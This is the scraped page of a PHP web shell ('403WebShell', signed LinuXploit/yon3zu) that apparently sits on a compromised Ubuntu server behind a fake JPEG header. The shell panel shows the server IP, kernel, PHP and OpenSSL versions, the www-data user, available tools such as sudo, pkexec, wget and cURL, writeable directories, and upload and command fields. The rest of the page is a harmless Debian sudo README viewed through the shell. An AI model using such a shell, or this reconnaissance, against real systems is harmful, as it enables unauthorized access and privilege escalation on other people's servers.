????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.144.91.201
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/sudo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/sudo/README.Debian
The version of sudo that ships with Debian by default resets the
environment, as described by the "env_reset" flag in the sudoers file.

This implies that all environment variables are removed, except for
LOGNAME, PATH, SHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, XAPPLRESDIR, 
XFILESEARCHPATH, XUSERFILESEARCHPATH, LANG, LANGUAGE, LC_*, and USER.

In case you want sudo to preserve more environment variables, you must
specify the env_keep variable in the sudoers file. You should edit the
sudoers file using the visudo tool.

Examples:
Preserve the default variables plus the EDITOR variable:

    Defaults env_keep+="EDITOR"

Preserve the default variables plus all variables starting with LC_:

    Defaults env_keep+="LC_*"

	- - - - -

If you're using the sudo-ldap package, note that it is now configured to 
look for /etc/sudo-ldap.conf.  Depending on your system configuration, it
probably makes sense for this to be a symlink to /etc/ldap.conf, or perhaps
to /etc/libnss-ldap.conf or /etc/pam_ldap.conf.  By default, no symlink or
file is provided, you'll need to decide what to do and create a suitable
file before sudo-ldap will work.

	- - - - -

As of version 1.7, sudo-ldap now requires the LDAP source to be specified
in /etc/nsswitch.conf with a line like:

  sudoers:	ldap

	- - - - -

Note that the support for the sss provider (libsss_sudo.so) that allows sudo
to use SSSD as a cache for policies stored in LDAP is included in the sudo 
package, not in the sudo-ldap package.  I have some hope that this turns out 
to be a better overall solution for using sudo with LDAP, as the sudo-ldap 
package is difficult to maintain and I'd love to be able to eliminate it!

	- - - - -

See the file OPTIONS in this directory for more information on the sudo
build options used in building the Debian package.

	- - - - -

If you're having trouble grasping the fundamental idea of what sudo is all
about, here's a succinct and humorous take on it...   

	http://www.xkcd.com/c149.html


Youez - 2016 - github.com/yon3zu
LinuXploit